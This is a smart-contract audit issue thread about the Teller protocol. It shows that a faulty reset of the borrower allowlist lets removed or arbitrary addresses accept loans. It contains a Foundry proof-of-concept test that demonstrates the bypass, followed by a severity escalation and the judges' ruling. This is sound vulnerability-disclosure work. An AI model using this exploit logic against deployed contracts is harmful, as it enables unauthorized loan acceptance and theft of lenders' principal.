### ISSUE TITLE
monrel - Unauthorized users can accept loans due to faulty update of commitmentBorrowerList

### ISSUE THREAD

**Issue by sherlock-admin** [sherlock-audit/2023-03-teller-judging#361]
monrel

high

# Unauthorized users can accept loans due to faulty update of commitmentBorrowerList

## Summary
 The `commitmentBorrowerList` can be corrupted due to incorrect usage of the `delete` keyword to remove objects from a mapping. This can lead to a state where anybody can accept a commitment even when the lender has updated the `commitmentBorrowersList` to only allow specific addresses.
 
## Vulnerability Detail

On [L240-L246](https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L240-L246) in the LenderCommitmentForwarder contract we see the following code:
```solidity
function updateCommitmentBorrowers(
		  uint256 _commitmentId,
		  address[] calldata _borrowerAddressList
	  ) public commitmentLender(_commitmentId) {
		  delete commitmentBorrowersList[_commitmentId]; 
		  _addBorrowersToCommitmentAllowlist(_commitmentId,_borrowerAddressList);
}
```

`commitmentBorrowerList[_commitmentId]` is an `EnumerableSetUpgradaeable.AddressSet` structure which is the following struct from [OpenZeppelin](https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/blob/master/contracts/utils/structs/EnumerableSetUpgradeable.sol).
```solidity
struct Set {
  bytes32[] _values;
  mapping(bytes32 => uint256) _indexes;
} 

struct AddressSet {
  Set _inner;
}

```
Deleting a struct with a mapping will not actually clear the data in storage. The `_indexes` mapping will therefore still be intact.

On [L253-L261](https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L253-L261) we see the following:
```solidity
function _addBorrowersToCommitmentAllowlist(
	  uint256 _commitmentId,
	  address[] calldata _borrowerArray
  ) internal {
	  for (uint256 i = 0; i < _borrowerArray.length; i++) {
		commitmentBorrowersList[_commitmentId].add(_borrowerArray[i]);
	  }
	  emit UpdatedCommitmentBorrowers(_commitmentId);
  }	  
```
`add` will run the following code. See [OpenZeppelin](https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/blob/master/contracts/utils/structs/EnumerableSetUpgradeable.sol).
```solidity
		  
function add(AddressSet storage set, address value) internal returns (bool) {
	return _add(set._inner, bytes32(uint256(uint160(value))));
}

function _add(Set storage set, bytes32 value) private returns (bool) {
	if (!_contains(set, value)) {
			set._values.push(value);
			// The value is stored at length-1, but we add 1 to all indexes
			// and use 0 as a sentinel value
			set._indexes[value] = set._values.length;
			return true;
	} else {
			return false;
	}
}

function _contains(Set storage set, bytes32 value) private view returns (bool) {
	  return set._indexes[value] != 0;
  
```

Since the `set._indexes` mapping is intact `_contains(set, values)` will return `true` for addresses that should have been removed. 

In `acceptCommitment()` on [L328-L332](https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L328-L332) we find the code that checks if a commitment is limited to certain addresses:
```solidity
require(
	commitmentBorrowersList[_commitmentId].length() == 0 ||
		commitmentBorrowersList[_commitmentId].contains(borrower),
	"unauthorized commitment borrower"
)
```

There are three potential results of calling `updateCommitmentBorrowers()`:

If `_borrowerAddressList()` is empty then anybody can accept the commitment and everything is fine.

If `_borrowerAddressList()` contains at least one new address the `set_values` array will have a length>0 but all addresses that have been previously added will also pass the above `require()` check since `.contains(borrower)` will return `true`. This means that the old addresses have not been removed and can still accept a commitment even though they should not be able to.

If `_borrowerAddressList()` is a subset of the previous borrowers  `set._indexes` will be empty   since the `!_contains(set, values)` check is false for each address in the `_add()` function so nothing is ever pushed to `set_values`. The result is that the `require()` statement above passes for any address. Any address can now accept a committed loan that was supposed to only be accessible to specific addresses.

The following POC explores the third most severe example where anybody can accept a loan that should only be accessible to 1 address.

In the POC the following happens:

1. A lender allows Bob and Alice to accept their committed loan.
2. Only Bob and Alice are now able to accept loans.
3. The lender now calls `updateCommitmentBorrowers()` with a list containing only Bob with the intent to only allow Bob to accept loans.
4. Due to the faulty update code anybody can accept the loan

To run the POC paste the following code into the LenderCommitmentForwarder_Combined_Test file. and run `forge test --match-test test_POC_FailedRemovalOfBorrower`

```solidity
   function test_POC_FailedRemovalOfBorrower() public {

        LenderCommitmentUser borrower2;
        LenderCommitmentUser borrower3;

        borrower2 = new LenderCommitmentUser(address(tellerV2Mock), (this));
        borrower3 = new LenderCommitmentUser(address(tellerV2Mock), (this));
         
        address[] memory borrowersArray2 = new address[](2);
        borrowersArray2[0] = address(borrower);
        borrowersArray2[1] = address(borrower2);

        uint256 commitmentId = 0;

        Commitment storage commitment = _createCommitment(
            CommitmentCollateralType.ERC20,
            maxAmount
        );

        lender._updateCommitmentBorrowers(commitmentId, borrowersArray2);
        
        
        borrower._acceptCommitment(
            commitmentId,
            100, //principal
            maxAmount, //collateralAmount
            0, //collateralTokenId
            address(collateralToken),
            minInterestRate,
            maxLoanDuration
        );

        assertEq(
            acceptBidWasCalled,
            true,
            "Expect accept bid called after exercise"
        );

        acceptBidWasCalled = false;

        borrower2._acceptCommitment(
            commitmentId,
            100, //principal
            maxAmount, //collateralAmount
            0, //collateralTokenId
            address(collateralToken),
            minInterestRate,
            maxLoanDuration
        );


        assertEq(
            acceptBidWasCalled,
            true,
            "Expect accept bid called after exercise"
        );
        
        bool acceptCommitAsMarketOwnerFails;

        try
            marketOwner._acceptCommitment(
                commitmentId,
                100, //principal
                maxAmount, //collateralAmount
                0, //collateralTokenId
                address(collateralToken),
                minInterestRate,
                maxLoanDuration
            )
        {} catch {
            acceptCommitAsMarketOwnerFails = true;
        }

        assertEq(
            acceptCommitAsMarketOwnerFails,
            true,
            "Should fail when accepting as invalid borrower"
        );

       lender._updateCommitmentBorrowers(commitmentId, borrowersArray);
       
        //------- ANYBODY CAN ACCEPT COMMITMENTS -------
            
        acceptBidWasCalled = false;
        borrower2._acceptCommitment(
            commitmentId,
            100, //principal
            maxAmount, //collateralAmount
            0, //collateralTokenId
            address(collateralToken),
            minInterestRate,
            maxLoanDuration
        );

        assertEq(
            acceptBidWasCalled,
            true,
            "Expect accept bid called after exercise"
        );

        acceptBidWasCalled = false;
        borrower3._acceptCommitment(
            commitmentId,
            100, //principal
            maxAmount, //collateralAmount
            0, //collateralTokenId
            address(collateralToken),
            minInterestRate,
            maxLoanDuration
        );

        assertEq(
            acceptBidWasCalled,
            true,
            "Expect accept bid called after exercise"
        );

        acceptBidWasCalled = false;
        marketOwner._acceptCommitment(
            commitmentId,
            99, //principal
            maxAmount, //collateralAmount
            0, //collateralTokenId
            address(collateralToken),
            minInterestRate,
            maxLoanDuration
        );

        assertEq(
            acceptBidWasCalled,
            true,
            "Expect accept bid called after exercise"
        );
```

## Impact
If `_borrowerAddressList()` contains at least one new borrower the old borrowers can still accepted a loan.

If `_borrowerAddressList()` is a subset of the previous borrowers any user can now accept the loan.

This is a critical issue, especially for undercollateralized loans or loans that require no collateral due to off-chain coordination. In such a scenario any user can steal the principle.

## Code Snippet

https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L240-L246

https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L328-L332

https://github.com/sherlock-audit/2023-03-teller/blob/main/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L253-L261

## Tool used
Vscode, foundry  
## Recommendation

To correctly remove borrowers use the `remove()` function in EnumerablSetUpgradeable.sol. 

Duplicate of #88

**Comment by 0xmonrel** [comment]
Escalate for 10 USDC

This is not a duplicate of [#88](https://github.com/sherlock-audit/2023-03-teller-judging/issues/88) and [#414](https://github.com/sherlock-audit/2023-03-teller-judging/issues/88), those only points to the issue that addresses can not be removed. 

**I will first argue that I have found a separate more severe issue:** 

When updating `commitmentBorrowerList` with [updateCommitmentBorrowers()](https://github.com/sherlock-audit/2023-03-teller/blob/9ba2598c2f386e9138cacc11a31b1b193cfd7aa3/teller-protocol-v2/packages/contracts/contracts/LenderCommitmentForwarder.sol#L240-L246) if `_borrowerArray` is a subset of the previous allowed addresses ANYBODY will be able to take the loan. This is a more severe issue than not being able to remove a user. Look at the original report for a POC and a detailed explanation of how memory corruption leads to a state where anybody can accept a loan when a lender is simply removing one or more addresses.

**I will now argue that the issue that I have identified is a HIGH issue:**

The protocol has been designed to support both loans with on-chain collateral and loans without any on-chain collateral, see [Documentation](https://docs.teller.org/teller-lite) and [this list](https://docs.teller.org/teller-v2/protocol-architecture/protocol-use-cases) for examples of protocol use-cases.

A lender offering loans without any on-chain collateral will do so based on off-chain coordination and/or based on on-chain reputation. Addresses allowed to accept these loans are carefully selected by the lender, the lender and borrower could even be in legally binding agreements. See [Goldfinch](https://goldfinch.finance) for a protocol offering similar loans.

Now, let's consider a scenario where Lender Bob has vetted Alice and Jenny to take a loan without any on-chain collateral, he has even entered into a legal agreement with Alice and Jenny. Bob creates a Loan that only Alice and Jenny can accept. Bob decides that he does not want to offer Alice the loan anymore so he removes Alice by using `updateCommitmentBorrowers()` - the contract will now enter a state where anybody can accept the loan. An anonymous user can now accept the loan and steal the entire principal.

The protocol has been designed for these kinds of loans. I have proven that a lender can have their entire principle stolen during completely normal and expected usage - I, therefore, believe this is a unique HIGH issue.

The issue (that I also identified) in  [#88](https://github.com/sherlock-audit/2023-03-teller-judging/issues/88) and [#414](https://github.com/sherlock-audit/2023-03-teller-judging/issues/88) is correctly labeled as a MEDIUM, failing to remove a user is significantly less severe since the case where principle can be stolen (under-collateralized or no on-chain collateral) will only be exposed to users that the lender has previously accepted, these are users that have been vetted by the lender. In the above example with Bob, Alice, and Jenny, this issue points to Alice still being able to take the loan after being removed, this is clearly not as severe as the issue I have found where anybody is able to take the loan.

**Comment by Trumpero** [comment]
I disagree with the escalation, this issue should be marked as a duplicate of #88. Issue #88 is not about the inability to remove users, but rather concerns the situation where users who are meant to be deleted can still obtain a loan (please refer to the impact and details of #88). Furthermore, I believe that medium severity is appropriate, as there is no direct loss incurred. While permissionless users may acquire certain loans, they still requires collateral, and any potential losses depend on the specific details of the loan.

**Comment by hrishibhat** [comment]
Escalation rejected

Duplicate of #88 
Although this issue points to additional outcomes the underlying issue still remains due to faulty update of borrower list, also no direct loss of funds as mentioned by the Lead judge.
